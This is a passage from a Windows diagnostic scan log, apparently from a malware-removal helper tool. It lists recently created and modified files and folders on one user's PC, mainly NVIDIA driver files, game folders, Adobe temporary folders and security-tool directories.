2017-12-26 17:58 - 2017-12-26 17:58 - 000000000 ____D C:\ProgramData\BitRaider
2017-12-26 17:55 - 2017-12-26 17:55 - 000000000 ____D C:\Users\Sblck\AppData\Local\SWTORPerf
2017-12-26 17:54 - 2017-12-26 17:54 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\EA
2017-12-26 16:24 - 2017-12-26 16:24 - 000000000 ____D C:\Users\Sblck\AppData\LocalLow\Graphite Lab
2017-12-24 22:16 - 2017-12-24 22:16 - 000000000 ____D C:\Users\Sblck\Documents\KillHouseGames
2017-12-21 01:14 - 2017-12-21 01:14 - 000000000 ____D C:\Users\Sblck\AppData\Local\Tempzxpsignd7f7090ca4ac1881
2017-12-21 01:14 - 2017-12-21 01:14 - 000000000 ____D C:\Users\Sblck\AppData\Local\Tempzxpsign513d5e68afbe06ff
2017-12-21 01:13 - 2017-12-21 01:13 - 000000000 ____D C:\Users\Sblck\AppData\Local\Tempzxpsignf275cfd24f8abf8f
2017-12-21 01:13 - 2017-12-21 01:13 - 000000000 ____D C:\Users\Sblck\AppData\Local\Tempzxpsignaa3ebf02045ed3f4
2017-12-21 01:13 - 2017-12-21 01:13 - 000000000 ____D C:\Users\Sblck\AppData\Local\Tempzxpsign71de186bca50890b
2017-12-21 01:13 - 2017-12-21 01:13 - 000000000 ____D C:\Users\Sblck\AppData\Local\Tempzxpsign62e729e85932ae9b
2017-12-21 01:13 - 2017-12-21 01:13 - 000000000 ____D C:\Users\Sblck\AppData\Local\Tempzxpsign36feac13f8ae187b
2017-12-20 23:19 - 2017-12-20 23:19 - 000000000 ____D C:\Users\Sblck\AppData\Local\Tempzxpsign8eda57a023064a99
2017-12-20 23:16 - 2017-12-20 23:16 - 000000000 ____D C:\Users\Sblck\AppData\Local\Tempzxpsign14ad0f9f816f04c3
2017-12-20 23:13 - 2017-12-20 23:13 - 000000822 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Media Encoder CC 2018.lnk
2017-12-20 23:10 - 2017-12-20 23:10 - 000000922 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe After Effects CC 2018.lnk
2017-12-20 23:07 - 2017-12-20 23:07 - 000000000 ____D C:\Users\Public\Documents\AdobeInstalledCodecs
2017-12-20 23:07 - 2017-12-20 23:07 - 000000000 ____D C:\ProgramData\Documents\AdobeInstalledCodecs
2017-12-20 17:59 - 2017-12-20 17:59 - 000000000 ____D C:\Users\Sblck\AppData\Local\Tempzxpsigne30d82309317b6ee
2017-12-20 17:59 - 2017-12-20 17:59 - 000000000 ____D C:\Users\Sblck\AppData\Local\Tempzxpsigna8e6c9e33f3e5864
2017-12-20 17:32 - 2017-12-20 17:32 - 000001224 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Creative Cloud.lnk
2017-12-20 00:50 - 2017-12-20 00:50 - 000000000 ____D C:\Users\Sblck\AppData\Roaming\NVIDIA
2017-12-16 20:30 - 2017-12-16 20:30 - 000000000 ____D C:\Users\Sblck\AppData\Roaming\Arrowhead
2017-12-14 21:07 - 2017-12-14 21:07 - 000000000 ____D C:\Users\Sblck\AppData\LocalLow\Temp
2017-12-12 19:57 - 2017-12-12 19:57 - 000000000 ____D C:\Users\Sblck\AppData\Roaming\HD Tune Pro
2017-12-12 19:57 - 2017-12-12 19:57 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\HD Tune Pro
2017-12-11 20:43 - 2017-12-15 20:01 - 000000000 ____D C:\Users\Sblck\Documents\Planetbase
2017-12-11 20:40 - 2017-12-11 20:40 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\GOG.com
2017-12-11 20:40 - 2017-12-11 20:40 - 000000000 ____D C:\ProgramData\GOG.com
2017-12-11 13:56 - 2017-12-11 13:56 - 000000000 ____D C:\Users\Sblck\AppData\Local\NVIDIA
2017-12-11 13:54 - 2017-12-28 15:31 - 000003022 _____ C:\Windows\System32\Tasks\MSIAfterburner
2017-12-11 13:49 - 2017-12-28 02:38 - 000000000 ____D C:\Program Files (x86)\MSI Afterburner
2017-12-11 13:49 - 2017-12-11 13:49 - 000000000 ____D C:\Users\Sblck\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\MSI Afterburner
2017-12-11 13:43 - 2017-12-11 13:43 - 000000000 ____D C:\Program Files (x86)\VulkanRT
2017-12-11 13:43 - 2017-12-05 21:17 - 000001951 _____ C:\Windows\NvTelemetryContainerRecovery.bat
2017-12-11 13:43 - 2017-12-05 19:36 - 000137200 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvStreaming.exe
2017-12-11 13:43 - 2017-09-13 23:20 - 000798008 _____ C:\Windows\SysWOW64\vulkan-1.dll
2017-12-11 13:43 - 2017-09-13 23:20 - 000490296 _____ C:\Windows\SysWOW64\vulkaninfo.exe
2017-12-11 13:43 - 2017-09-13 23:19 - 000927544 _____ C:\Windows\system32\vulkan-1.dll
2017-12-11 13:43 - 2017-09-13 23:19 - 000591160 _____ C:\Windows\system32\vulkaninfo.exe
2017-12-11 13:42 - 2017-12-28 15:32 - 000000000 ____D C:\ProgramData\NVIDIA
2017-12-11 13:42 - 2017-12-11 13:43 - 000000000 ____D C:\Program Files (x86)\NVIDIA Corporation
2017-12-11 13:42 - 2017-12-05 21:17 - 000531856 _____ (Khronos Group) C:\Windows\system32\OpenCL.dll
2017-12-11 13:42 - 2017-12-05 21:17 - 000438768 _____ (Khronos Group) C:\Windows\SysWOW64\OpenCL.dll
2017-12-11 13:42 - 2017-12-05 19:56 - 000001951 _____ C:\Windows\NvContainerRecovery.bat
2017-12-11 13:42 - 2017-12-05 19:32 - 005966696 _____ (NVIDIA Corporation) C:\Windows\system32\nvcpl.dll
2017-12-11 13:42 - 2017-12-05 19:32 - 002589168 _____ (NVIDIA Corporation) C:\Windows\system32\nvsvc64.dll
2017-12-11 13:42 - 2017-12-05 19:32 - 001766288 _____ (NVIDIA Corporation) C:\Windows\system32\nvsvcr.dll
2017-12-11 13:42 - 2017-12-05 19:32 - 000607304 _____ (NVIDIA Corporation) C:\Windows\system32\nv3dappshext.dll
2017-12-11 13:42 - 2017-12-05 19:32 - 000450352 _____ (NVIDIA Corporation) C:\Windows\system32\nvmctray.dll
2017-12-11 13:42 - 2017-12-05 19:32 - 000122768 _____ (NVIDIA Corporation) C:\Windows\system32\nvshext.dll
2017-12-11 13:42 - 2017-12-05 19:32 - 000082744 _____ (NVIDIA Corporation) C:\Windows\system32\nv3dappshextr.dll
2017-12-11 13:42 - 2017-11-25 12:40 - 007874971 _____ C:\Windows\system32\nvcoproc.bin
2017-12-11 13:40 - 2017-12-11 13:43 - 000000000 ____D C:\ProgramData\NVIDIA Corporation
2017-12-11 13:40 - 2017-12-05 21:17 - 040238576 _____ (NVIDIA Corporation) C:\Windows\system32\nvcompiler.dll
2017-12-11 13:40 - 2017-12-05 21:17 - 036301384 _____ (NVIDIA Corporation) C:\Windows\system32\nvoglv64.dll
2017-12-11 13:40 - 2017-12-05 21:17 - 035156368 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvcompiler.dll
2017-12-11 13:40 - 2017-12-05 21:17 - 029345592 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvoglv32.dll
2017-12-11 13:40 - 2017-12-05 21:17 - 023266584 _____ (NVIDIA Corporation) C:\Windows\system32\nvopencl.dll
2017-12-11 13:40 - 2017-12-05 21:17 - 022257256 _____ (NVIDIA Corporation) C:\Windows\system32\nvwgf2umx.dll
2017-12-11 13:40 - 2017-12-05 21:17 - 019526696 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvwgf2um.dll
2017-12-11 13:40 - 2017-12-05 21:17 - 019039792 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvopencl.dll
2017-12-11 13:40 - 2017-12-05 21:17 - 018208784 _____ (NVIDIA Corporation) C:\Windows\system32\nvd3dumx.dll
2017-12-11 13:40 - 2017-12-05 21:17 - 016851768 _____ (NVIDIA Corporation) C:\Windows\system32\Drivers\nvlddmkm.sys
2017-12-11 13:40 - 2017-12-05 21:17 - 015027984 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvd3dum.dll
2017-12-11 13:40 - 2017-12-05 21:17 - 013867656 _____ (NVIDIA Corporation) C:\Windows\system32\nvcuda.dll
2017-12-11 13:40 - 2017-12-05 21:17 - 013255032 _____ (NVIDIA Corporation) C:\Windows\system32\nvptxJitCompiler.dll
2017-12-11 13:40 - 2017-12-05 21:17 - 011782096 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvcuda.dll
2017-12-11 13:40 - 2017-12-05 21:17 - 010883744 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvptxJitCompiler.dll
2017-12-11 13:40 - 2017-12-05 21:17 - 004285704 _____ (NVIDIA Corporation) C:\Windows\system32\nvapi64.dll
2017-12-11 13:40 - 2017-12-05 21:17 - 003808144 _____ (NVIDIA Corporation) C:\Windows\system32\nvcuvid.dll
2017-12-11 13:40 - 2017-12-05 21:17 - 003799032 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvapi.dll
2017-12-11 13:40 - 2017-12-05 21:17 - 003347952 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvcuvid.dll
2017-12-11 13:40 - 2017-12-05 21:17 - 001989944 _____ (NVIDIA Corporation) C:\Windows\system32\nvdispco6438859.dll
2017-12-11 13:40 - 2017-12-05 21:17 - 001674736 _____ (NVIDIA Corporation) C:\Windows\system32\nvdispgenco6438859.dll
2017-12-11 13:40 - 2017-12-05 21:17 - 001615472 _____ (NVIDIA Corporation) C:\Windows\system32\nvhdagenco6420103.dll
2017-12-11 13:40 - 2017-12-05 21:17 - 001135464 _____ (NVIDIA Corporation) C:\Windows\system32\nvfatbinaryLoader.dll
2017-12-11 13:40 - 2017-12-05 21:17 - 001099848 _____ (NVIDIA Corporation) C:\Windows\system32\NvFBC64.dll
2017-12-11 13:40 - 2017-12-05 21:17 - 001031984 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\NvFBC.dll
2017-12-11 13:40 - 2017-12-05 21:17 - 000981816 _____ (NVIDIA Corporation) C:\Windows\system32\NvIFR64.dll
2017-12-11 13:40 - 2017-12-05 21:17 - 000933360 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\NvIFR.dll
2017-12-11 13:40 - 2017-12-05 21:17 - 000885496 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvfatbinaryLoader.dll
2017-12-11 13:40 - 2017-12-05 21:17 - 000616432 _____ (NVIDIA Corporation) C:\Windows\system32\NvIFROpenGL.dll
2017-12-11 13:40 - 2017-12-05 21:17 - 000527288 _____ (NVIDIA Corporation) C:\Windows\system32\nvEncodeAPI64.dll
2017-12-11 13:40 - 2017-12-05 21:17 - 000505928 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\NvIFROpenGL.dll
2017-12-11 13:40 - 2017-12-05 21:17 - 000492232 _____ (NVIDIA Corporation) C:\Windows\system32\nvumdshimx.dll
2017-12-11 13:40 - 2017-12-05 21:17 - 000446216 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvEncodeAPI.dll
2017-12-11 13:40 - 2017-12-05 21:17 - 000407064 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvumdshim.dll
2017-12-11 13:40 - 2017-12-05 21:17 - 000225208 _____ (NVIDIA Corporation) C:\Windows\system32\Drivers\nvhda64v.sys
2017-12-11 13:40 - 2017-12-05 21:17 - 000171712 _____ (NVIDIA Corporation) C:\Windows\system32\nvinitx.dll
2017-12-11 13:40 - 2017-12-05 21:17 - 000154208 _____ (NVIDIA Corporation) C:\Windows\system32\nvoglshim64.dll
2017-12-11 13:40 - 2017-12-05 21:17 - 000149736 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvinit.dll
2017-12-11 13:40 - 2017-12-05 21:17 - 000132072 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvoglshim32.dll
2017-12-11 13:40 - 2017-12-05 21:17 - 000046182 _____ C:\Windows\system32\nvinfo.pb
2017-12-11 13:40 - 2017-12-05 21:17 - 000045496 _____ (NVIDIA Corporation) C:\Windows\system32\nvhdap64.dll
2017-12-11 13:40 - 2017-12-05 21:17 - 000000669 _____ C:\Windows\SysWOW64\nv-vk32.json
2017-12-11 13:40 - 2017-12-05 21:17 - 000000669 _____ C:\Windows\system32\nv-vk64.json
2017-12-10 15:35 - 2017-12-10 15:35 - 000000000 ____D C:\Users\Sblck\AppData\Local\EotU
2017-12-10 00:33 - 2017-12-10 00:33 - 000000000 ____D C:\Users\Sblck\Documents\Duels of the Planeswalkers Dumps
2017-12-09 20:21 - 2017-12-09 20:21 - 000000000 ____D C:\Program Files (x86)\Origin Games
2017-12-09 18:01 - 2017-12-09 18:01 - 000000000 ____D C:\ProgramData\PopCap Games
2017-12-09 13:54 - 2017-12-09 13:54 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Plants vs. Zombies
2017-12-09 03:51 - 2017-12-09 03:51 - 000000000 ____D C:\Users\Sblck\Documents\My Spore Creations
2017-12-09 03:51 - 2017-12-09 03:51 - 000000000 ____D C:\Users\Sblck\AppData\Roaming\Spore
2017-12-09 03:50 - 2017-12-09 03:50 - 000000000 ____D C:\Users\Sblck\AppData\Roaming\Spore_Uninstall
2017-12-09 03:36 - 2017-12-09 03:36 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Spore
2017-12-07 19:35 - 2017-12-07 19:35 - 000000000 ____D C:\Users\Sblck\AppData\Local\Tempzxpsign7266a15b525aa838
2017-12-07 19:34 - 2017-12-07 19:34 - 000000000 ____D C:\Users\Sblck\AppData\Local\Tempzxpsign0000f4ed20649afa
2017-12-06 17:57 - 2017-12-06 17:57 - 000000000 ____D C:\Users\Sblck\Documents\MATLAB
2017-12-06 17:57 - 2017-12-06 17:57 - 000000000 ____D C:\Users\Sblck\AppData\Roaming\Subversion
2017-12-06 17:57 - 2017-12-06 17:57 - 000000000 ____D C:\Users\Sblck\AppData\Roaming\MathWorks
2017-12-06 17:57 - 2017-12-06 17:57 - 000000000 ____D C:\Users\Sblck\AppData\Local\MathWorks
2017-12-05 19:19 - 2017-12-05 19:19 - 000000000 ____D C:\Users\Sblck\Documents\BlackSquad
2017-12-04 00:07 - 2017-12-04 00:07 - 000000000 ____D C:\Users\Sblck\Documents\MCEdit
2017-11-26 22:47 - 2017-11-26 22:47 - 000000000 ____D C:\Users\Sblck\AppData\Local\Tempzxpsignf49ae4ad83beedc8
2017-11-26 22:45 - 2017-11-26 22:45 - 000000000 ____D C:\Users\Sblck\AppData\Local\Tempzxpsignc28b08663467271a
2017-11-26 22:41 - 2017-11-26 22:41 - 000000000 ____D C:\Users\Sblck\AppData\Local\Tempzxpsignef2a74e2843cf788
2017-11-26 22:41 - 2017-11-26 22:41 - 000000000 ____D C:\Users\Sblck\AppData\Local\Tempzxpsign41ec64c3e173c19b
2017-11-26 21:15 - 2017-11-26 21:15 - 000000000 ____D C:\Users\Sblck\AppData\Local\Tempzxpsignedf00a6ddbb4d290
2017-11-26 21:15 - 2017-11-26 21:15 - 000000000 ____D C:\Users\Sblck\AppData\Local\Tempzxpsign00ccc6373fada887
2017-11-26 13:54 - 2017-11-26 13:54 - 000000000 ____D C:\Users\Sblck\AppData\Local\Tempzxpsign15c8f34141d5c6b7
2017-11-26 13:52 - 2017-11-26 13:52 - 000000000 ____D C:\Users\Sblck\AppData\Local\Tempzxpsigne784c78685adaf39
2017-11-23 03:54 - 2017-11-23 03:54 - 000000000 ____D C:\Users\Sblck\AppData\LocalLow\DefaultCompany
2017-11-22 14:50 - 2017-11-22 14:50 - 000000000 ____D C:\Users\Sblck\AppData\Local\Tempzxpsignf6e3b47f5a53e117
2017-11-22 14:50 - 2017-11-22 14:50 - 000000000 ____D C:\Users\Sblck\AppData\Local\Tempzxpsignf3b67203cb22b183
2017-11-22 14:50 - 2017-11-22 14:50 - 000000000 ____D C:\Users\Sblck\AppData\Local\Tempzxpsignc7311e6aa6c16d00
2017-11-21 23:17 - 2017-11-21 23:17 - 000000000 ____D C:\Users\Sblck\AppData\Local\Tempzxpsigndca989c2a691f122
2017-11-21 23:17 - 2017-11-21 23:17 - 000000000 ____D C:\Users\Sblck\AppData\Local\Tempzxpsign09cafcfd66331e17
2017-11-21 23:16 - 2017-11-21 23:16 - 000000000 ____D C:\Users\Sblck\AppData\Local\Tempzxpsign43b3aef9bec386db
2017-11-21 23:15 - 2017-11-21 23:15 - 000000000 ____D C:\Users\Sblck\AppData\Local\Tempzxpsignd8ea424b3bbaf058
2017-11-21 23:15 - 2017-11-21 23:15 - 000000000 ____D C:\Users\Sblck\AppData\Local\Tempzxpsigna031bf1394f7ea9d
2017-11-21 23:15 - 2017-11-21 23:15 - 000000000 ____D C:\Users\Sblck\AppData\Local\Tempzxpsign3747a9c77f21fa51
2017-11-20 23:52 - 2017-11-20 23:52 - 000000000 ____D C:\Users\Sblck\Documents\Wizards of the Coast
2017-11-19 19:35 - 2017-11-19 19:49 - 000000000 ____D C:\Users\Sblck\AppData\Local\SniperElite4
2017-11-19 18:01 - 2017-11-19 18:01 - 000000000 ____D C:\Users\Sblck\AppData\Roaming\FiraxisLive
2017-11-18 03:46 - 2017-11-18 03:46 - 000000000 ____D C:\Users\Sblck\AppData\Local\licensecb
2017-11-18 03:46 - 2017-11-18 03:46 - 000000000 ____D C:\Users\Sblck\AppData\Local\CrazyBump
2017-11-18 03:46 - 2017-11-18 03:46 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Crazybump
2017-11-18 03:46 - 2017-11-18 03:46 - 000000000 ____D C:\ProgramData\licensecb
2017-11-18 03:46 - 2017-11-18 03:46 - 000000000 ____D C:\ProgramData\CrazyBump
2017-11-18 03:38 - 2017-11-18 03:38 - 000000000 ____D C:\Users\Sblck\AppData\Local\Tempzxpsignb9d6e6b7ad88c487
2017-11-18 03:38 - 2017-11-18 03:38 - 000000000 ____D C:\Users\Sblck\AppData\Local\Tempzxpsignafb35abf79e011df
2017-11-18 03:36 - 2017-11-18 03:36 - 000151552 _____ C:\Windows\SysWOW64\nvRegDev.dll
2017-11-18 03:36 - 2017-11-18 03:36 - 000061440 _____ C:\Windows\SysWOW64\nvPhotoshopUtil.dll
2017-11-18 03:36 - 2017-11-18 03:36 - 000040960 _____ C:\Windows\SysWOW64\nvISWOW64.dll
2017-11-18 03:35 - 2017-11-18 03:35 - 000000000 ____D C:\Users\Sblck\AppData\Local\Tempzxpsign9938f7fce9f70162
2017-11-18 03:35 - 2017-11-18 03:35 - 000000000 ____D C:\Users\Sblck\AppData\Local\Tempzxpsign5b4548c9aa578ffd
2017-11-18 03:04 - 2017-11-18 03:04 - 000000000 ____D C:\Users\Sblck\AppData\Local\Tempzxpsigne2395fb6ae04a9e8
2017-11-17 23:19 - 2017-11-17 23:19 - 000000000 ____D C:\Users\Sblck\AppData\Local\Tempzxpsign425ca40bdaf241b6
2017-11-02 19:42 - 2017-11-02 19:42 - 000000000 ____D C:\Users\Sblck\AppData\Local\Gaijin
2017-11-02 19:42 - 2017-11-02 19:42 - 000000000 ____D C:\ProgramData\Gaijin
2017-10-29 13:01 - 2017-10-29 13:01 - 000000000 ____D C:\Users\Sblck\AppData\Local\Tempzxpsign3e1a8b5fec0c3ae6
2017-10-29 13:01 - 2017-10-29 13:01 - 000000000 ____D C:\Users\Sblck\AppData\Local\Tempzxpsign2b3b45c44ba5f39d
2017-10-29 10:24 - 2017-10-30 00:17 - 000000000 ____D C:\Program Files (x86)\Bethesda.net Launcher
2017-10-29 10:24 - 2017-10-29 10:24 - 000000000 ____D C:\Users\Sblck\AppData\Local\Bethesda.net Launcher
2017-10-29 10:24 - 2017-10-29 10:24 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Bethesda.net Launcher
2017-10-28 15:36 - 2017-10-29 10:26 - 000028634 _____ C:\Windows\SysWOW64\report.txt
2017-10-24 19:00 - 2017-10-24 19:00 - 000000000 ____D C:\Users\Sblck\AppData\Local\Tempzxpsign6f1a0c57d83c0492
2017-10-24 18:55 - 2017-10-24 18:55 - 000000000 ____D C:\Users\Sblck\AppData\Local\Tempzxpsign325cda0e9abcb804
2017-10-22 12:44 - 2017-10-22 12:44 - 000000000 ____D C:\Users\Sblck\AppData\Local\Tempzxpsign77380ddfb806fa9d
2017-10-22 12:43 - 2017-10-22 12:43 - 000000000 ____D C:\Users\Sblck\AppData\Local\Tempzxpsign692ad4480b1f60c0
2017-10-22 12:43 - 2017-10-22 12:43 - 000000000 ____D C:\Users\Sblck\AppData\Local\Tempzxpsign225fe9082b45a7bc
2017-10-20 19:22 - 2017-10-20 19:22 - 000000000 ___DL C:\Users\Sblck\AppData\LocalLow\PlayReady
2017-10-19 20:32 - 2017-10-19 20:32 - 000000000 ____D C:\Users\Sblck\AppData\Local\Tempzxpsignf7bd919c199c87f6
2017-10-19 20:26 - 2017-10-19 20:26 - 000000000 ____D C:\Users\Sblck\AppData\Local\Tempzxpsignb405962e9ce5cce7
2017-10-19 17:02 - 2017-10-19 17:02 - 000000000 ____D C:\Users\Sblck\AppData\Local\Tempzxpsign6da66a11dfb36ab4
2017-10-19 16:10 - 2017-10-19 16:10 - 000000000 ____D C:\Users\Sblck\AppData\Local\Tempzxpsign4d067e243ff85d44
2017-10-19 15:58 - 2017-10-19 15:58 - 000000000 ____D C:\Users\Sblck\AppData\Local\Tempzxpsign49388b14198ce2a5
2017-10-19 15:58 - 2017-10-19 15:58 - 000000000 ____D C:\Users\Sblck\AppData\Local\Tempzxpsign297555f6cfd137f3
2017-10-19 15:57 - 2017-10-19 15:57 - 000000000 ____D C:\Users\Sblck\AppData\Local\Tempzxpsignd340a5d0bdc1b189
2017-10-19 15:57 - 2017-10-19 15:57 - 000000000 ____D C:\Users\Sblck\AppData\Local\Tempzxpsignc5622ede20631c0c
2017-10-19 15:57 - 2017-10-19 15:57 - 000000000 ____D C:\Users\Sblck\AppData\Local\Tempzxpsignbebae350bdc1bb63
2017-10-19 15:57 - 2017-10-19 15:57 - 000000000 ____D C:\Users\Sblck\AppData\Local\Tempzxpsign99b0334243b2566d
2017-10-18 21:21 - 2017-12-28 16:02 - 000056592 _____ C:\Windows\ZAM.krnl.trace
2017-10-18 21:21 - 2017-12-28 16:02 - 000026635 _____ C:\Windows\ZAM_Guard.krnl.trace
2017-10-16 17:11 - 2017-10-16 17:11 - 000003156 _____ C:\Windows\System32\Tasks\{4F5304D5-3859-490D-8CFF-18EC617A72A0}
2017-10-15 02:02 - 2017-10-15 02:02 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Cheat Engine 6.7
2017-10-11 20:26 - 2017-10-11 20:26 - 000000000 ____D C:\Users\Sblck\AppData\Local\Tempzxpsignef570bad0409f5e4
2017-10-11 20:26 - 2017-10-11 20:26 - 000000000 ____D C:\Users\Sblck\AppData\Local\Tempzxpsign5d8ec6d855e02ca7
2017-10-11 20:16 - 2017-10-11 20:16 - 000000000 ____D C:\Users\Sblck\AppData\Local\Tempzxpsigna22540f0eb98a292
2017-10-11 20:16 - 2017-10-11 20:16 - 000000000 ____D C:\Users\Sblck\AppData\Local\Tempzxpsign209d3aee20673077
2017-10-05 19:02 - 2017-10-05 19:02 - 000000000 ____D C:\Users\Sblck\Documents\Larian Studios
2017-10-02 21:30 - 2017-10-02 21:30 - 000000000 ____D C:\Users\Sblck\AppData\Local\Tempzxpsignbf5dbab5c9c4e2d4
2017-10-02 21:28 - 2017-10-02 21:28 - 000000000 ____D C:\Users\Sblck\AppData\Local\Tempzxpsign136dfb4c6fa6c714
2017-10-02 20:02 - 2017-10-02 20:02 - 000000000 ____D C:\Users\Sblck\AppData\Local\Tempzxpsignba5d5115aff520c0
2017-10-02 20:02 - 2017-10-02 20:02 - 000000000 ____D C:\Users\Sblck\AppData\Local\Tempzxpsignb1780934cf391076
2017-10-02 01:42 - 2017-10-02 01:42 - 000000000 ____D C:\Users\Sblck\AppData\Local\Tempzxpsign6907d18f5db3277e
2017-10-02 01:42 - 2017-10-02 01:42 - 000000000 ____D C:\Users\Sblck\AppData\Local\Tempzxpsign4d6ee4c0f3fbf1ff
2017-10-01 23:45 - 2017-10-01 23:45 - 000000000 ____D C:\Users\Sblck\AppData\Local\Tempzxpsign76161c73b2ce0397
2017-10-01 23:44 - 2017-10-01 23:44 - 000000000 ____D C:\Users\Sblck\AppData\Local\Tempzxpsigne7e9ccfff13584b6
2017-10-01 22:45 - 2017-10-01 22:45 - 000000000 ____D C:\Users\Sblck\AppData\Local\Tempzxpsign8cb96ebec8778ad6
2017-10-01 22:45 - 2017-10-01 22:45 - 000000000 ____D C:\Users\Sblck\AppData\Local\Tempzxpsign6592b828128e5bc3
2017-10-01 19:17 - 2017-10-01 19:17 - 000000000 ____D C:\Users\Sblck\AppData\Roaming\vibranceGUI
2017-10-01 06:20 - 2017-10-01 06:20 - 000000000 ____D C:\Users\Sblck\AppData\Local\Tempzxpsign183b9f211678f850
2017-10-01 06:19 - 2017-10-01 06:19 - 000000000 ____D C:\Users\Sblck\AppData\Local\Tempzxpsign811ce507fdea9134
2017-10-01 06:16 - 2017-10-01 06:16 - 000000000 ____D C:\Users\Sblck\AppData\Local\ImageViewerFallout4
2017-10-01 06:15 - 2017-10-01 06:15 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Sir Garnon
2017-09-30 13:14 - 2017-09-30 13:14 - 000000000 ____D C:\Users\Sblck\AppData\Local\Tempzxpsignccb7cef389fc010a
2017-09-30 13:14 - 2017-09-30 13:14 - 000000000 ____D C:\Users\Sblck\AppData\Local\Tempzxpsign3c9da3de96a4ef5f
2017-09-30 12:59 - 2017-09-30 12:59 - 000000000 ____D C:\Users\Sblck\AppData\Local\Tempzxpsignf7db0e0bf20ca1c3
2017-09-30 12:59 - 2017-09-30 12:59 - 000000000 ____D C:\Users\Sblck\AppData\Local\Tempzxpsign149158164e9c79b7
2017-09-30 12:51 - 2017-09-30 12:51 - 000000000 ____D C:\Users\Sblck\AppData\Local\Tempzxpsignf1e6e19c3a4b1b37
2017-09-30 12:41 - 2017-09-30 12:41 - 000000000 ____D C:\Users\Sblck\AppData\Local\Tempzxpsign82f44058b5ed65ef

==================== Three Months Modified files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2017-12-28 15:58 - 2017-09-16 20:22 - 004765190 _____ C:\Windows\ntbtlog.txt
2017-12-28 15:39 - 2009-07-14 04:45 - 000026352 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2017-12-28 15:39 - 2009-07-14 04:45 - 000026352 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2017-12-28 15:34 - 2016-10-31 13:58 - 000192216 _____ (Malwarebytes) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2017-12-28 15:33 - 2016-09-27 16:20 - 000000000 ____D C:\Program Files (x86)\Steam
2017-12-28 15:32 - 2009-07-14 05:08 - 000000006 ____H C:\Windows\Tasks\SA.DAT
2017-12-28 15:17 - 2009-07-14 03:20 - 000000000 ____D C:\Windows\Web
2017-12-28 11:00 - 2016-10-08 15:07 - 000000428 _____ C:\Windows\Tasks\ScpUpdater.job
2017-12-28 06:48 - 2016-10-31 20:24 - 000007594 _____ C:\Users\Sblck\AppData\Local\Resmon.ResmonCfg
2017-12-28 04:41 - 2009-07-14 03:20 - 000000000 ____D C:\Windows\inf
2017-12-28 04:09 - 2017-01-20 00:15 - 000000000 ____D C:\ProgramData\Sophos
2017-12-28 04:08 - 2016-09-27 16:01 - 000000000 ____D C:\Windows\pss
2017-12-28 02:42 - 2016-10-01 18:03 - 000000000 ____D C:\ProgramData\HitmanPro
2017-12-28 02:24 - 2017-09-22 00:32 - 000000000 ____D C:\AdwCleaner
2017-12-28 02:22 - 2016-09-29 14:49 - 000000000 ____D C:\Users\Sblck\AppData\Local\CrashDumps
2017-12-28 02:13 - 2009-07-14 03:20 - 000000000 ____D C:\Windows\Help
2017-12-28 01:45 - 2016-12-01 15:18 - 000000000 ____D C:\Users\Sblck\AppData\Local\Ubisoft Game Launcher
2017-12-27 14:58 - 2017-07-25 03:04 - 000000000 ____D C:\Users\Sblck\AppData\Roaming\vlc
2017-12-26 22:33 - 2017-03-06 00:16 - 000000000 ____D C:\ProgramData\Origin
2017-12-26 21:31 - 2017-07-19 19:27 - 000000000 ____D C:\Program Files (x86)\RivaTuner Statistics Server
2017-12-26 17:54 - 2009-07-14 05:32 - 000000000 ___RD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Games
2017-12-26 13:13 - 2016-09-30 13:56 - 000003408 _____ C:\Windows\System32\Tasks\GyazoUpdateTaskMachineDaily
2017-12-26 13:13 - 2016-09-30 13:56 - 000003282 _____ C:\Windows\System32\Tasks\GyazoUpdateTaskMachine
2017-12-26 13:13 - 2016-09-30 13:56 - 000000000 ____D C:\Program Files (x86)\Gyazo
2017-12-25 00:55 - 2016-09-28 20:25 - 000000000 ____D C:\Users\Sblck\AppData\Roaming\Tunngle
2017-12-24 22:19 - 2016-09-28 20:25 - 000000000 ____D C:\ProgramData\Tunngle
2017-12-24 03:17 - 2017-04-22 02:51 - 000000000 ____D C:\Users\Sblck\AppData\LocalLow\Mozilla
2017-12-24 00:48 - 2017-04-23 00:37 - 000000000 ____D C:\Program Files (x86)\Mozilla Firefox
